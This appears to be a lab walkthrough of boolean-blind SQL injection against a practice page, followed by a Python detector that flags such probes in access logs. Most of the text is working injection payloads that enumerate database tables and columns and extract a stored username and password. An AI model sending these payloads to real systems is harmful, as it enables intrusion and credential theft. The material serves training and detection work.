1. Initial state:
2. Enter ?id=1 and 1=2--+ and observe that no error is raised:
Adding a single quote still produces no change, so the next step is to try a double quote:
?id=1' and 1=2--+
3. Adding a double quote shows that we can proceed:
?id=1" and 1=2--+
4. Guessing the column count: values 1 to 3 produce no change, and 4 produces an error, so the column count is 3:
?id=1" order by 4--+
5. Looking for a display position, the method used in the first four levels no longer works, so the next step is to try blind injection:
?id=-1" union select 1,2,3--+
6. First guess the length of the current database name:
Every value other than 8 shows no yellow text:
Anything other than 8:
?id=1" and length(database())=5--+
8:
?id=1" and length(database())=8--+
7. Try to guess the database version:
?id=1" and left(version(),1)='5'--+
?id=1" and left(version(),3)='5.7'--+
?id=1" and left(version(),5)='5.7.2'--+
?id=1" and left(version(),6)='5.7.26'--+
Guessing each digit step by step as above reveals the database version to be 5.7.26.
8. Start guessing the database name character by character:
ASCII code reference table: https://ascii.911cha.com/
?id=1" and left(database(),1)='s'--+
?id=1" and left(database(),2)='se'--+
?id=1" and left(database(),3)='sec'--+
?id=1" and left(database(),4)='secu'--+
?id=1" and left(database(),5)='secur'--+
?id=1" and left(database(),6)='securi'--+
?id=1" and left(database(),7)='securit'--+
?id=1" and left(database(),8)='security'--+
Since step 6 established that the current database name has length 8, the current database is confirmed to be security.
9. First guess how many tables the current database has. The page displays normally when the value is 4, so there are 4 tables:
?id=1" and (select count(table_name) from information_schema.tables where table_schema='security')=4--+
10. Guess the name length of each of the 4 tables:
?id=1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6--+
?id=1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8--+
?id=1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 2,1)=7--+
?id=1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5--+
From the above, the 4 table names have lengths 6, 8, 7 and 5.
11. The goal is to find the users table; assume the fourth table is users:
?id=1" and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users'--+
Verified successfully.
12. Guess the number of columns in the users table:
?id=1" and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3--+
So the users table has 3 columns.
13. Guess the length of each column name in the users table:
?id=1" and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=2--+
?id=1" and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)=8--+
?id=1" and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 2,1)=8--+
14. Guess each column name:
(1) Guess whether the first column name is id:
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1)='i'--+
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),2)='id'--+
(2) Guess whether the second column name is username:
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),1)='u'--+
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),8)='username'--+
(3) Guess whether the third column name is password:
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),8)='password'--+
15. Guess the length of the first username and its password:
?id=1" and (select length(username) from users limit 0,1)=4--+
?id=1" and (select length(password) from users limit 0,1)=4--+
16. Guess the username and password; from experience, guess Dumb:
?id=1" and left((select username from users limit 0,1),4)='Dumb'--+
?id=1" and left((select password from users limit 0,1),4)='Dumb'--+
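As an added defensive example (not part of the original walkthrough): a small Python detector that URL-decodes the query parameters in constructed Apache-style access-log lines, flags the signatures of the probes used above (a quote directly after a numeric id, the --+ comment terminator, order by N, length()/left() comparisons, information_schema lookups, database()/version() calls), and then reports any source that sends a run of such requests, since a boolean-blind extraction shows up as a long series of near-identical requests from one client rather than a single odd URL. The log lines, the client IP and the /Less-8/ path are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache common log format), not taken from
# the original walkthrough. Line 1 is benign; lines 2-4 carry probes of the kinds shown above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-8/?id=1 HTTP/1.1" 200 720
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-8/?id=1%22%20and%20length(database())%3D8--+ HTTP/1.1" 200 720
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-8/?id=1%22%20order%20by%204--+ HTTP/1.1" 200 650
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-8/?id=1%22%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema%3Ddatabase())%3D4--+ HTTP/1.1" 200 720
"""

# Each indicator is (name, regex) applied to the URL-decoded parameter value.
INDICATORS = [
    ("quote_after_number", re.compile(r"^\s*\d+\s*['\"]")),            # 1" or 1'
    ("sql_comment", re.compile(r"--(\s|$)|#")),                         # --+ decodes to "-- "
    ("boolean_func", re.compile(r"\b(and|or)\b.*\b(length|left|substr|substring|ascii|mid)\s*\(", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("db_fingerprint", re.compile(r"\b(database|version|user)\s*\(\s*\)", re.I)),
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def indicators_for(value):
    """Names of all indicators that match one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]

def scan_log(log_text):
    """Return one dict per request whose query parameter trips at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qsl decodes %XX escapes and turns '+' into a space, as the server does.
        for param, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
            found = indicators_for(value)
            if found:
                hits.append({"ip": line.split()[0], "param": param, "value": value, "indicators": found})
    return hits

def suspicious_sources(log_text, threshold=3):
    """Source IPs with at least `threshold` flagged requests in the log."""
    counts = {}
    for hit in scan_log(log_text):
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Matching on decoded values matters: the same probes with spaces as %20 and the quote as %22 would slip past a pattern applied to the raw request line.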